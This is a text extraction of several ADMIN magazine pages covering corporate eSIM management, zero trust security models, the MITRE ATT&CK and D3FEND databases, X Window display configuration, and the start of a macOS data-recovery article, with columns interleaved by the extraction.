longer takes place on the company lion in 2021 to 3.4 billion in 2025 [1].
premises but at home. Employees
the Rise In the long term, it’s possible that
need to be able to commission their The embedded SIM is a chip built these rising numbers could lead to
devices into operation as easily as into the mobile device that stores one the elimination of the slot for physi-
possible while complying with corpo- or more profiles belonging to network cal SIMs in mobile devices and to
rate security standards. operators. For this purpose, each eSIMs becoming the sole standard.
Devices need to be directly subordi- eSIM has an eID: a unique number eSIM technology is already being
nate to a unified endpoint manage- used to authenticate the user on the used successfully outside of mobile
ment (UEM) system to ensure that mobile network. eSIM technology communications (e.g., in the ioT and
they are configured in line with replaces physical SIMs in mini, mi- connected car sectors).
corporate policies. IT support can’t cro, or nano format and offers many
supervise employees while they advantages for users. The eSIM looks Fast Commissioning on the
are at home and would be happy completely different from a physical
User Side
Photo by Glen Carrie on Unsplash

to field as few requests for help as SIM and solves some of its chal-
possible. The same applies when a lenges, as well. One advantage of the eSIM lies in
device needs to be replaced. The ex- eSIM technology was first used in a simplified operations. A physical
change needs to take place with as smartwatch by manufacturer Sam- SIM first has to be handed over to
little overhead as possible for both sung in 2016. In the following years, the employee, either in person or by
users and IT. its use was enabled in smartwatches surface mail. Once received, it has to

78 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 eSIMs M A N AG E M E N T

be broken out of the packaging and security is offered by a feature that in cooperation with Deutsche Tele-
inserted into the device. With the only allows an eSIM profile to be kom [2]) can help in these scenarios.
eSIM, these two steps are eliminated, decrypted and installed on a device In conjunction with a UEM system,
and errors, misuse, and long shipping assigned to the user. an eSIM manager makes it possible
routes can be avoided. The absence of a physical SIM card to link the required data from various
Employees can enable eSIM profiles also reduces the risk of misuse be- sources and make the data clearly
regardless of their time zone and cause the eSIM cannot be slotted visible and usable in a portal. Using
location by scanning a QR code. All into another (possibly private) de- such portals, administrators can as-
they need is an Internet connection. vice. If a device does happen to be sign an eSIM to a device and remotely
In this way, employees can be ready stolen or lost, IT support can quickly enable the eSIM (and also revoke it
to start work within a few minutes deactivate the eSIM remotely and de- again if necessary) in a quick and
without any intervention on the part lete the data from the device within easy way. The software therefore
of IT support. This advantage saves the UEM system. enables both the commissioning of a
time and resources for both sides, es- new eSIM profile and the migration of
pecially in times of hybrid work mod- Wary of Change a physical SIM to an eSIM profile with
els and decentralized IT structures. just a few clicks.
All told, the eSIM offers many ad- The process is equally convenient on
Parallel Use of Plans vantages over the physical SIM, and the user’s side: Employees can define
its use in smartphones in Germany when they want to migrate to suit
For employees who travel on busi- is on the rise, mainly in the private their needs and complete the move
ness, the IT department can issue an sector, whereas German corpora- with just a few clicks. The plan can
eSIM with a plan for the appropriate tions still mainly use physical SIMs. then be used directly. The software
country at short notice. The eSIM also Organizations with a large number of not only helps manage eSIMs in
often supplements a physical SIM employees and complex structures in companies but also facilitates parallel
card. For example, a business and a particular are worried that switching management of physical SIM cards,
private plan can be used in parallel from a physical card to an eSIM could because the portal also displays the
on the same device. In many cases, mean massive overhead in terms of details you need to manage physical
this would not be possible without time, resources, and manual work cards, such as the PIN and PUK.
the eSIM because not every device of- to set up the new system. After all,
fers the option of inserting two physi- administrators need to configure vari- Conclusions
cal SIM cards in one device. ous data (e.g., the eID, email address,
Likewise, the use of multiple business device model: information that can Corporations, administrators, and IT
plans is no longer a problem. De- usually be viewed on the UEM system decision makers need to start looking
pending on the device, up to 10 eSIM in use) to enable an eSIM profile, but at eSIM technology today. After all,
profiles can be stored and selected in the data first has to be retrieved from it offers a huge amount of potential
parallel, which is a major advantage various sources. for today’s, and tomorrow’s, world of
in terms of costs, as well, for compa- Additional data such as the telephone work. Employees want and need to
nies that have opted for Bring Your number, the selected rate plan, or work more flexibly: from their home
Own Device (BYOD) or for private details of the existing card, such as offices, from a hotel room on busi-
use of business devices (corporate- the ICC (the SIM serial number), can ness trips, or onsite with customers.
owned, personally enabled; COPE). usually be found in the provider’s eSIM technology supports this style of
Employees also benefit because they customer portal or even stored indi- work by offering flexibility and con-
don’t have to carry two devices for vidually in Excel lists. venience and saving administrative
personal and business use. The changeover can therefore require overhead and costs. Q
many manual steps on the part of
Benefits in Mobile Security the corporation if the data cannot be
merged automatically. These steps Info
Compared with the physical SIM, the apply not only when switching from [1] eSim device installations: [https://www.
eSIM boosts security when working the physical SIM card to the eSIM but juniperresearch.com/press/esim-device-
on the move. eSIMs come with vari- also if a device needs to be replaced installations-to-reach-3-4-billion]
ous security measures implemented later, is lost or stolen, or a non-do- [2] eSIM Business Manager: [https://ebf.
by default. The eSIM profile instal- mestic plan is required. com/en/esim-business-manager-taking-
lation on a new device is encrypted endpoint-enrollment-to-the-next-level/]
to prevent data leaks. The same ap- Simplified Management
plies with end-to-end transmission Author
between the eSIM provider’s serv- New software (e.g., the eSIM Busi- Marco Föllmer is a managing partner and
ers and the end device. Additional ness Manager, which EBF developed founder of EBF GmbH.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 79
M A N AG E M E N T Zero Trust

Zero Trust as a security strategy

Beyond the Patch

Acceptance of zero trust models like BeyondCorp by Google or LISA by Netflix lags in Europe, where endpoint
security is king. We examine why this situation must change by looking into the principles of modern zero trust
concepts. By Martin Loschwitz

Even if you don’t want to hear it, especially for employees outside the password by just one character if
European IT is not necessarily known local network, which in today’s envi- worst comes to worst.
for being hyper-innovative – for a va- ronment, can easily be the majority Supposedly progressive companies
riety of reasons. Successful startups, of a work force. have started the next round in the
for example, are far less likely to be fight against such passwords and
launched in Europe than in the US, Standards from the Last check the password against a diction-
and not because no bright minds with ary or for certain character strings.
smart ideas are on the east side of the
Century For example, although “2021” is not
Atlantic, but because of the structures One area in which this can be seen allowed in a password and the pass-
of the industry as such. The much- more clearly than in almost any other word manager will protest, it will still
quoted bon mot “we’ve always done is security. Partners from the US or accept “2o21” as an entry without
things this way” contains more than a Israel who regularly work with large any complaints. External observers
shred of truth. Anyone who has ever German corporations (my milieu) are will start looking for the candid cam-
experienced a European IT company amazed at the standards of security era when they see all these security
from the inside will know what I and compliance that are still com- measures from the last millennium
mean when I say that the impression monplace in this country. and realize that two-factor authentica-
is more of an archeological excavation Stating that access to your own email tion is not mandatory.
site than a technology company. on a smartphone is supposed to be
Wrapped up in this dilemma is enter- linked to a mobile VPN “because of We Have Always Done It
prise devotion to endpoint security security” often leads to bewilder-
in a local network, which encounters ment among observers. Likewise,
This Way
problems when administering clients that many large European corpora- Many security and compliance mea-
Photo by Jack Dong on Unsplash

outside that network and necessarily tions still force employees to change sures in today’s companies are more
feeds the VPN revenue stream. How- their passwords on a regular basis apparent than real, and this phe-
ever, rebuilding your infrastructure raises an eyebrow among others. nomenon can be seen, for example,
to implement a zero trust concept This confusion is understandable, in the idea of the “secure local net-
will pay off in the long run with less because it has long been shown that work,” which continues to be used
complexity and higher effectiveness, users simply change their existing unwaveringly by many corporations

80 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Zero Trust M A N AG E M E N T

up and down the continent – even and follows the maxim that only the important data are not located in the
if the representative of an insurance most secure client possible is the last internal zone but in a “very internal”
company at the customer’s location word of wisdom is fatally mistaken. zone, which in turn is separated from
cannot issue a contract because the To explain this in more detail, how- what is already an internal zone by a
software that communicates with the ever, I need to briefly digress into DMZ with an integrated firewall. The
central systems in the enterprise can- the subject of secure networks and division into segments has one flaw:
not establish a VPN connection. VPN explain why this concept has long Once you are on the “local network”
connections don’t need thick wires, since become obsolete. with a client, you are given access to
but they do need reliable ones. the other components of the setup,
You can’t win a pot of gold with The Secure Network even if your intentions are dishonest.
a connection hampered by a poor In environments of this type, a client
enhanced data GSM environment
Principle gets access to infrastructure simply
(EDGE) or because of a completely Admittedly, in many companies, the because it is in a certain physical or
overloaded 4G network. idea of a secure local network dates logical location.
Nevertheless, many companies are back to a time when the threat sce- What may not sound so dangerous
forcing their employees to use these nario in IT was completely different at the data center becomes a real
and other technical measures of du- from the current scenario. Moreover, problem in the context of clients. Be-
bious benefit. As if things weren’t anyone who had to plan security for a cause the principle of a secure local
bad enough, some managers are not company at the end of the 1990s did network is so tempting at first glance,
afraid to cite data protection blatantly not have even a fraction of the tools many companies have quickly ap-
as the cause of the malaise. In the available to admins today. Accord- plied it to their client landscapes, too.
given context, it is not uncommon to ingly, most companies took a crude They are actively supported by many
hear that the European Union General approach: The IT department simply service providers who generate hor-
Data Protection Regulation (GDPR) is divided the world into good and evil, rendous revenues with VPN solutions
to blame because it mandates secure or, as it was usually implemented, (Figure 2). The result is that some
communication in line with “state- into “them” (evil hackers) and “us” of a company’s services can no lon-
of-the-art principles” and “especially (corporate users). ger be used in any meaningful way
because of COVID.” Even before CO- The people in charge followed because they are practically inacces-
VID and long before the GDPR, it was through with this segregation with sible. If the company’s own service
simply ignored if 2,500 colleagues total consistency at all levels of the laptop breaks down, an employee is
had to make their way through the company’s IT. Most admins still en- practically unable to work until they
same, way too narrow VPN gateway. counter this basic idea in the data are issued replacement hardware that
The nonsense that is sometimes center today (e.g., when there is an is allowed to talk to the VPN.
heard in the corporate security con- internal zone containing the most
text would often be euphemistically important systems that do not have Why the Secure Network
described as “discouraging.” a direct connection to the Internet).
Also in the mix is the demilitarized
Principle Fails
Endpoint as the Central zone (DMZ), to which access from The big problem with the secure net-
outside is meticulously regulated by work idea is that it is patently false
Building Block firewalls (Figure 1). The third net- and didn’t work well even years and
While reading this article, you might work segment,
be wondering what the rant about the Internet, is
large corporations and their some- evil, ugh, and
times absurd security theater has to be avoided
to do with endpoint security. The to the greatest
answer to this question may be some- extent possible.
what surprising to some, because it is Larger enter-
very relevant. Consistently and cor- prises and de-
rectly implemented security on end ployments have
devices is a huge building block on further refined
the way to a modern security archi- this principle by
tecture in your company. segmenting their
However, for endpoint security to networks even
work effectively, it needs various further.
other factors. Anyone who consid- In this case, the Figure 1: DMZ strategies are one of the oldest implementations
ers endpoint security to be the only servers with of the secure local area network principle, but in today’s IT, this
factor in the fight against attackers the particularly approach has had its day.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 81
M A N AG E M E N T Zero Trust

decades ago. The idea that a client not only what it says on the box but where and when. The usability of a
of any kind is trustworthy simply also a virus or a cryptocurrency miner company’s IT services falls victim to
because it has access to a certain that generates traffic without end, se- the quest for the greatest possible and
network segment is nonsense. The curity has already gone to pot. most complete security.
rule implicitly assumes that the users To aggravate things, modern IT is Administrators then come to the bitter
who use the respective clients know extremely complex – companies that realization that a client being located
what they are doing and can handle deal with IT forensics consequently in a certain place (or not) cannot be
the privileges they have been granted. make a lot of money, and for good a valid indicator for or against protec-
The opposite is the case, as various reason. After all, in a software-de- tive measures. Tools that propagate
examples from the past prove. fined environment, tracing the paths this approach (e.g., VPN-based prod-
The stories in which security re- attackers have taken after illegally ucts) are a relic of the past, propagat-
searchers succeeded in gaining access accessing a network element is diffi- ing dubious security strategies and
to employees’ systems with floppy cult and often even impossible. Entire limiting the usability of services but
disks labeled “porn” left in company government agencies, hospitals, and offering few effective benefits.
restrooms are the stuff of legend – be- companies go offline for days and Once this incontrovertible fact has
cause the floppies naturally contained weeks after such problems, until the seeped in, it sharpens the eye for real
viruses. In this case, the entire secu- network is patched back together opportunities. Once again, industry
rity strategy is doomed, because once with some degree of difficulty. leader Google has shown how this can
an attacker has access to a system in- look. At Google, the idea of the secure
side the setup, most security precau- Security Until IT Shutdown network became obsolete years ago.
tions no longer work. Instead, the company is pursuing a
Other examples of the nonsensical Companies with legacy security strat- strategy known as BeyondCorp [1]. The
nature of the secure network ap- egies are usually aware of their short- core aspect of this strategy is that the
proach are the countless cases of comings, and the most abominable focus is no longer on the individual
hacked Docker containers and OS workarounds tend to sprout up: Mail
images that are now roaming the net. servers are hidden in even deeper in-
Admittedly, from the user’s point of ternal network segments, or complex
view, it is tedious to build your own firewall constructs are created that
OS image from the providers’ sources. have to be extended by rules with
The temptation to organize a ready- hyper-complex processes. At the end
made image off the web is great, of the madness is one big something
even if the image might be of dubious that the admins of a company often
provenance. Admins struggle with the can no longer keep track of in its
results of such thoughtlessness every entirety, partly because it is unclear
day. If the ready-made image contains which security measures take effect

Figure 3: In BeyondCorp environments,

clients are granted access only if they can
identify themselves as authorized on the
basis of multiple factors. Here, the app is
asking if I am trying to log in and whether I
Figure 2: VPN networks also propagate the principle of the secure local network but fail to have tried logging in near Berlin, Germany,
acknowledge the complex attack scenarios of today. on my Intel Mac OS X 10.15 device.

82 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Zero Trust M A N AG E M E N T

client, but on its applications and the certain network address or is located What BeyondCorp Is All
way they communicate with the exist- at a certain physical location (Fig-
ing infrastructure. ure 3). Rather, any employee can ac-
About
cess their resources from any client in BeyondCorp’s central approach is to
BeyondCorp the world at any time, as long as the approve access to any service only if
client with which this happens ad- it meets several requirements. It must
I want to take the wind out of the heres to a few rules that make it trust- always be authenticated; that is, the
sails of an argument often raised worthy, and it is those rules that make requesting client must have proven
against the BeyondCorp principle up the BeyondCorp principle. that it is authorized for the requested
right from the start: Google’s solution Incidentally, Google’s approach has resource. High standards apply. Ad-
does not mean that admins com- inspired a number of other tech gi- ditionally, access must be authorized.
pletely dispense with security precau- ants. Netflix also says that it now A central rights management system
tions. Quite the opposite: The servers uses a zero trust architecture (i.e., a must therefore specify that the client
that Google operates for services like system in which the provider’s ser- is allowed access to the resource it is
Gmail or Google Drive are subject vices do not trust a client at all, re- currently trying to access.
to explicit, very strict, and tightly gardless of where it is). Netflix calls Encryption of the connection is
meshed rules. The point is far more the principle location-independent mandatory, not optional. At least
that Google does not differentiate be- security approach (LISA) and has this point is taken for granted from
tween “internal” and “external” con- admittedly invented a far nicer name today’s perspective; however, if you
nections for its own services. Instead, than Google. BeyondCorp, LISA, and go back 10 years, you could still find
every client is basically considered most zero trust approaches use the some web stores that did not have
untrustworthy. same basic principles; therefore, in SSL certificates to process orders se-
Therefore, an individual client does the further course of this article, I curely. Google’s BeyondCorp concept
not automatically receive more rights will no longer distinguish between would not, of course, allow connec-
than others simply because it has a the implementations. tions without encryption, because
M A N AG E M E N T Zero Trust

that would mean that any bad guy form of sense in the context of Be- bundled BeyondCorp into a boxed
with access to the line between cli- yondCorp. After all, only if a service product that is available for a price.
ent and server – often several thou- can make decisions about allowing or The provider even offers migration
sand kilometers in length – could denying the connection on the basis consultancy to interested custom-
read the data traffic. For a client to of various properties and parameters ers. Google has long since ceased to
be trusted from the service’s point of the endpoint in question does the be the only player on the market.
of view, it has to be able to use en- admin gain genuine control over the If you do not want to commit to
crypted connections. individual clients, which admittedly Google’s services, and they do play a
However, the requirements for the requires a bit more than just properly major role in BeyondCorp, you will
client and its user are not yet com- configured services. find similar approaches and com-
plete. In the context of a BeyondCorp For good reason, mobile device man- plete packages on offer from other
procedure, a user is only granted agement is a fixed component of all providers. Additionally, a market of
access to a resource if it is possible LISA and BeyondCorp environments. consulting companies now exist that
to establish a direct connection be- If a smartphone is lost, the respec- can implement similar concepts with
tween them, their environment, and tive owner (e.g., the company) can on-premises components in the cus-
the technical client. What is stated in remotely delete the device and render tomer’s data center.
the BeyondCorp guidelines in some- it unusable, making BYOD scenarios
what cryptic terms generally means possible: Anyone who wants to use Conclusions
two-factor authentication (2FA) in their own iPad can do so if they place
everyday life. the device under the auspices of the Endpoint security can only work if
In this way, Google consequently relevant compliance and security the device that the user relies on is
eliminates the eternal password team. As a rule, this condition does part of a tight network of security
problem: If 2FA is activated for ac- not restrict the functions, but the user functions. From today’s perspective,
cess, it is initially irrelevant if a user’s does relinquish some of their sover- it is grossly negligent simply to as-
username and password fall into the eignty over the device. sume no danger from a client on the
hands of attackers. For them to log VPN. Anyone who has had to deal
in and access the client’s data, they Zero Trust – No with procedures of this type from an
need the second factor – usually a admin point of view will be aware
smartphone – with a suitable app that
Alternatives that it can make daily operations ex-
can be used to grant approval for the Anyone who has ever struggled as I tremely tiresome.
respective access. Authentication with have with the sometimes unusable Truly, most companies in Europe are
an SMS text code has rightly fallen infrastructure services of German still fighting against the realization
into disrepute today, and applications corporate IT will sooner or later come that the principle of the secure net-
such as Google’s Authenticator offer to the conclusion that BeyondCorp is work has had its day. However, this
better alternatives. an absolute must-have. Many com- strategy is not sustainable. The princi-
For its own services, Google now panies shy away from this realization ple of “better late than never” applies
goes so far as to display a warning because it requires a huge rebuild of here. If you decide to implement a
in the respective apps (e.g., Gmail) if their own infrastructure. For this rea- comparable strategy today, you have
the same account logs in on another son, it is not possible to share tips or the option, or at least a perspective,
device. If the user does not confirm advice here with regard to individual of getting away from the IT of the
this access on their own smartphone, components. past. However, if you continue to re-
Google rejects it. As a rule, smart- Anyone who gets around to imple- sist, you can expect to be faced with
phones are also secured against menting a zero trust concept for their an increasingly difficult-to-maintain
access by strangers – for example, own company usually starts on a and convoluted infrastructure. Q
by an unlock pattern or facial rec- green field and redesigns their IT ap-
ognition, which is practically a third plication landscape, leading to unease
factor. Even if the bad guys were to and costly outlays. Google itself, how- Info
get their hands on the smartphone in ever, proves with statistics from its [1] BeyondCorp: [https://cloud.google.com/
addition to the combination of user- own business that BeyondCorp does beyondcorp]
name and password, they would still pay off in the long run. Higher em-
not be able to do anything with the ployee effectiveness, a less complex
stolen device. infrastructure to maintain, and fewer The Author
sprawling processes in the company Freelance journalist Martin
Strict Regime for Clients are just a few of the benefits that ulti- Gerhard Loschwitz focuses
mately show up in the bottom line. primarily on topics such
A large portion of endpoint security Of course, Google wouldn’t be Google as OpenStack, Kubernetes,
products only begin to make some if the company hadn’t long ago and Ceph.

84 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
N U TS A N D B O LTS MITRE ATT&CK & D3FEND

Attack and defense techniques

Cybersecurity
Know-How
The MITRE ATT&CK and D3FEND knowledge databases provide useful techniques for securing your
IT infrastructure. By Matthias Wübbeling

IT security affects many different unique identifiers to vulnerabilities, techniques and methods enriched
areas of a company. Trying to iden- and also developed STIX and CyBox, with details about hacker groups and
tify possible attack vectors for each which are used to exchange threat in- their individual procedures. For an
area in advance and protect the IT formation and attack indicators. initial overview of the knowledge
infrastructure with effective counter- The MITRE ATT&CK and D3FEND base, visit the ATT&CK website [1]
measures can be a Sisyphean task, es- knowledge databases offer tech- and Matrices in the top menubar. In
pecially for companies without a Se- niques that let you retrace an at- the sidebar on the left, the ATT&CK
curity Operation Center (SOC). When tacker’s steps, as well as prevent dataset is broken down by Enter-
it comes to implementing security attacks in the first place. Here’s how prise (enterprise IT), Mobile (smart-
measures, knowledge and experience to use these techniques to secure phones), and ICS (industrial control
Photo by Artem Bryzgalov on Unsplash

are important. your enterprise IT. systems). Both Enterprise and Mobile
MITRE, a nonprofit organization that are directly integrated into the inter-
operates various research facilities on ATT&CK face, while ICS currently still links to
behalf of the U.S. government, pro- a wiki with more information.
vides comprehensive information on Released to the public in 2015, The matrices, sorted chronologi-
IT security. MITRE developed the CVE MITRE’s ATT&CK framework pro- cally, are based on Lockheed Mar-
system, for identifying and assigning vides a knowledge database of attack tin’s Cyber Kill Chain [2]. For the

86 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 MITRE ATT&CK & D3FEND N U TS A N D B O LTS

Enterprise Matrix, you’ll find pre- from the defender’s point of view. your progress in securing the infra-
paratory techniques in the Recon- The D3FEND matrix has five different structure. This helps you delegate
naissance phase on the left. On the techniques for securing your com- individual tasks within your team
far right, you’ll find an attacker’s puter systems. On the left side of the and include quick overviews of the
potential activities after successfully matrix, Harden lists four technique status quo in your reports.
hijacking a system under the Exfil- categories for securing systems and
tration and Impact phases. resources before using them. You’ll Conclusions
In order to take a closer look at find methods for compiling software,
individual techniques, I will focus securing passwords, and encrypting MITRE ATT&CK and D3FEND
on the Phishing for Information [3] messages, as well as how to use TPM- knowledge bases provide you with
technique listed under the Recon- based boot protection or hard disk comprehensive insights into cyberse-
naissance phase. If you click on encryption. curity techniques. You can use these
Phishing for Information, you will The Detect category offers tech- databases as a foundation for secur-
be taken to a detailed page with niques that can be used to detect ing your enterprise IT infrastructure
further information. There, you will malicious activities or to evaluate or simply as a reference for the next
learn how attackers send phishing general activities on your network. capture-the-flag event. If you find
messages to potential victims in Staying with the phishing example, something missing in the knowledge
order to obtain more information clicking on Sender MTA Reputation databases, you can contribute con-
from companies, such as login data Analysis (located under the Mes- tent for future versions. In this way,
for computer systems. Keep in mind sage Analysis subcategory) takes expert knowledge can be bundled
that this technique differs from the you to a page with techniques for and made available to as many com-
Phishing technique listed under evaluating message transfer agents panies as possible. Q
the Initial Access phase, where the (MTAs). For instance, you can de-
objective is to send executable code termine a trust rating for the sender
(malware) as part of a phishing MTA based on past behavior, such Info
campaign. as receiving prior emails from an [1] ATT&CK: [https://attack.mitre.org]
In the Procedure Examples section, MTA, the domains used as sender [2] Lockheed Martin Cyber Kill Chain:
you’ll find examples of groups that domains, or the number of reply [https://www.lockheedmartin.com/en-us/
have used such techniques in the emails from an MTA. capabilities/cyber/cyber-kill-chain.html/]
past, often with brief comments. Each technique entry in the [3] Phishing for Information technique:
The Mitigations section lists two D3FEND database contains direct [https://attack.mitre.org/techniques/
potential countermeasures: Software links to the relevant ATT&CK tech- T1598/]
Configuration and User Training. niques, as well information about [4] “Hardening Network Systems with
The Software Configuration counter- implementations or patents that DNS” by Matthias Wubbeling, AD-
measure references SPF, DKIM, and cover corresponding techniques. In MIN, issue 66, 2021, [https://www.
DMARC (see also [4] and the “Trust- this way, you can jump back and admin-magazine.com/Archive/2021/66/
worthy” article in this issue) in order forth from one MITRE database Hardening-network-services-with-DNS]
to limit the success of legacy email to another to quickly determine [5] D3FEND: [https://d3fend.mitre.org]
phishing. The User Training counter- whether you thought of everything [6] ATT&CK STIX data: [https://github.com/
measure relies on training employees during hardening. The D3FEND mitre-attack/attack-stix-data/]
to detect and thwart phishing at- knowledge base is a logical comple-
tempts. The Detection section pri- ment to the ATT&CK database. The Author
marily describes automated options Dr. Matthias Wübbeling is an IT security en-
for detecting the technology, which thusiast, scientist, author, consultant, and
you can use for protection and also Systematic Use speaker. As a Lecturer at the University of
for creating situation reports. The For a deeper insights, or to col- Bonn in Germany and Researcher at Fraunhofer
Reference section contains sources lect and process information in a FKIE, he works on projects in network security,
and further information, including targeted way, ATT&CK offers ad- IT security awareness, and protection against
scientific papers, reports, and articles ditional connections. For example, account takeover and identity theft. He is the
for further research. if you already use a tool for ana- CEO of the university spin-off Identeco, which
lyzing STIX data, you can import keeps a leaked identity database to protect
D3FEND STIX datasets prepared by MITRE employee and customer accounts against iden-
directly from the repository [6]. tity fraud. As a practitioner, he supports the
Analogous to the attack techniques The ATT&CK navigator can be used German Informatics Society (GI), administrat-
specified in the ATT&CK framework, to mark relevant entries during re- ing computer systems and service back ends.
the MITRE D3FEND [5] knowledge search and to display correlations, He has published more than 100 articles on IT
base provides you with information thus letting you plan and trace security and administration.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 87
N U TS A N D B O LTS Optimizing X Window Displays

Configuring X Window input and output devices

Tailor-Made
Two command-line tools, xandr and xinput, let you optimize your X
Window display from the terminal. By Thorsten Scherf

An X Window System provides sev- With xrandr, you can configure the X HDMI interface and you want to dis-
eral components to allow users to Window System’s Resize and Rotate play an inverted image:
interact with a graphical interface. (RandR) extension to adjust the main
An X server lets applications, also window, which the X clients use for xrandr --output HDMI-1 U
known as X clients, use a graphical display purposes, to suit your needs. --rotate inverted --mode 1920x1080
display within windows. The window Using xrandr --listmonitors gives
manager determines the look and feel you an overview of all the monitors Setting up the Mouse and
of such an interface, as well as takes connected to the system and their
care of how the windows are handled current configurations:
Touchpad
(e.g., enlarging, reducing, or closing Another popular X Window System
them). A desktop manager, which is xrandr --listmonitors setting is the configuration for natural
ultimately responsible for bringing or- scrolling. Often on Linux, the default
der to this kind of graphical interface, Monitors: 3 setting for the connected mouse and
displays icons, menus, panels, and 0: +*eDP-1 1920/309x1080/174+3000+0 eDP-1 the internal touchpad behaves like
other elements on the desktop. 1: +DP-2-2 1080/510x1920/287+0+0 DP-2-2 a scroll bar, which differs from the
Even though various graphical tools 2: +DP-2-3 1920/598x1080/336+1080+0 DP-2-3 behavior on a device with a touch-
exist to optimally adapt your existing screen. In other words, scrolling up
hardware to the X Window System, You can use xrandr -q to see which causes the screen to scroll up, and
you can also do this from a terminal modes the individual devices support. scrolling down causes it to scroll
using command-line tools. You simply You can then set the desired mode for down. However, on a smartphone or
need to use the right tool to make the a device as follows: tablet touchscreen, it is the other way
setting you need. In this article, I will around, which means that many us-
show how to adjust some typical dis- xrandr --output DP-2-2 --left-of eDP-1 U ers will want to adjust this setting on
play settings from the terminal using --mode 1920x1080 their laptops or desktops.
xandr and xinput. In the X Window System, the libev-
This command ensures that the monitor ent library is responsible for pro-
Setting up the Display DP-2-2, which is connected to the com- cessing a user’s input events and
puter’s DisplayPort, uses a resolution of reacting to them accordingly. The
One problem that occurs time and 1920x1080 pixels and says that the de- configuration for the individual input
time again relates to the correct dis- vice is located to the left of the laptop’s devices relies on the xinput tool. An
play resolution. If you use several internal display (eDP-1). You can easily overview of the available devices can
monitors or also use a projector, it is move the mouse to the left to switch be displayed using the xinput list
often difficult to determine the correct from the internal display to the external command (Figure 1).
order of the devices so that you can monitor. If you operate the monitor in The natural scrolling setting relates to
use a mouse to easily switch between portrait mode, simply extend the com- the mouse and touchpad. All the avail-
the windows of the different devices. mand to include the --rotate left or able configuration settings for these de-
You may also need to rotate the image --rotate right option as follows: vices can be displayed with the help of
shown on a display – for instance, if
Photo by Ilya lix on Unsplash

you have installed a projector upside xrandr --output DP-2-2 --rotate left U xinput list-props <ID>
down on the ceiling or want to use a --left-of eDP-1 --mode 1920x1080
monitor in portrait mode. To solve all where you replace the ID with the
of these problems, you can use the The following command is useful if device name (Figure 2). This is also
xrandr tool. you use a projector connected to an recommended, since the ID is not static

88 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Optimizing X Window Displays N U TS A N D B O LTS

Listing 1: /etc/X11/xorg.conf.d/99-libinput.conf
Section "InputClass"
Identifier "MOSART Wireless Mouse"
MatchProduct "MOSART Semi. 2.4G Wireless Mouse"
Option "Natural Scrolling " "true"
EndSection
Section "InputClass"
Identifier "Elan Touchpad"
MatchProduct "Elan Touchpad"
Option "Natural Scrolling" "true"
EndSection

settings in the configuration file for the

X server. Listing 1 shows an example
Figure 1: With xinput list, you can see all available devices on your system. for the libevent system. Another option
is to create a script with the respective
and may well change. The following two The xinput command displays all in- commands for each new X session.
commands give you the same results for put devices. The advantage here is that you can
both the mouse and the touchpad: also use the xrandr and xinput tools
Persistent Settings (and others) in this script without hav-
xinput list-props 14 ing to worry about the special syntax
xinput list-props U Keep in mind that the settings you of the configuration file for the X Win-
'MOSART Semi. 2.4G Wireless Mouse' make with xrandr and xinput are not dow System (see Listing 2).
persistent. To fix this problem, you
xinput list-props 17 have a variety of options. In the sim- Conclusions
xinput list-props 'Elan Touchpad' plest case, you can create a startup
file in which you enter the respective The xrandr and xinput command-line
To change the setting, you can go commands and then ensure that this tools help you make extensive settings
back to the ID as well as to the name file is called automatically by your for input and output devices on your
of the respective setting: desktop or window manager. systems. To make these settings persis-
If you are looking for an approach that tent, be sure to store your settings in
xinput set-prop 14 326 1 is independent of your desktop or win- an X server configuration file or create
xinput set-prop U dow manager, you can also store the a script using these tools. QZ
'MOSART Semi. 2.4G Wireless Mouse' U
'libinput Natural Scrolling Enabled' 1 Listing 2: /etc/X11/Xsession.d/99-libinput-xrandr.conf
xrandr --output eDP-1 --right-of DP-2-2 --mode 1920x1080
xinput set-prop 17 326 1 xrandr --output DP-2-2 --rotate left --left-of eDP-1 --mode 1920x1080
xinput set-prop 'MOSART Semi. 2.4G Wireless Mouse' 'libinput Natural Scrolling Enabled' 1
xinput set-prop 'Elan Touchpad' U
xinput set-prop 'Elan Touchpad' 'libinput Natural Scrolling Enabled' 1
'libinput Natural Scrolling Enabled' 1

Figure 2: A device’s configuration settings.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 89
N U TS A N D B O LTS Rescuing macOS Data

macOS file recovery and security

Salvage
macOS on-board tools and third-party applications can help prevent the loss of files
and make security and backup your first priority. By Thomas Joos

If data loss under macOS is the result the “Security and Privacy” box). The recover data. If synchronization with
of defective hard drives, you need to protected directories include Docu- iCloud is activated in the settings on
adopt a structured approach for file ments, Desktop, the iCloud drive, and the Mac, then accidentally deleted
recovery. Since macOS 10.15, the oper- Downloads. Furthermore, apps are not data can be partially recovered from
ating system has separated the system allowed to access external drives with- icloud.com on devices that are logged
from the data, wherein macOS creates out permission. Another protection in with the same Apple account.
one volume for the system and one for is that Gatekeeper in macOS checks These settings can be found in System
data. Both storage locations use the whether apps are digitally signed and Preferences | Apple ID | iCloud under
APFS filesystem. Users only have read originate from the App Store. Starting the Options button (Figure 1).
permissions for the system volume, in version 10.15, the system repeats Various volumes such as USB sticks
which does not impose any restrictions this test regularly – not just when first have their own Trash bins. Some skill
on the user when working. At the same launched. is required here because you can
time, however, this provides better pro- If you use a data recovery program recover data from hidden files in the
tection for the system. However, you and read this hard drive, you could terminal. In the Finder, you can use
do need to take this into account when aggravate the problem. If data has the Cmd+Shift+. (period) keyboard
recovering data and be careful when been lost because of a defective hard shortcut to show hidden files.
using recovery programs. drive, the first step is to stop using The Library folder often still contains
Additionally, access to files and folders the system. If it is clear that the hard copies of deleted Microsoft Office
by third-party apps is restricted (see drive is causing the trouble but is documents. To open the Finder, press
still generally working, it can be use- Cmd+Shift+G and enter the path
Security and Privacy ful to make a complete copy of the (~\Library). Note that you have at
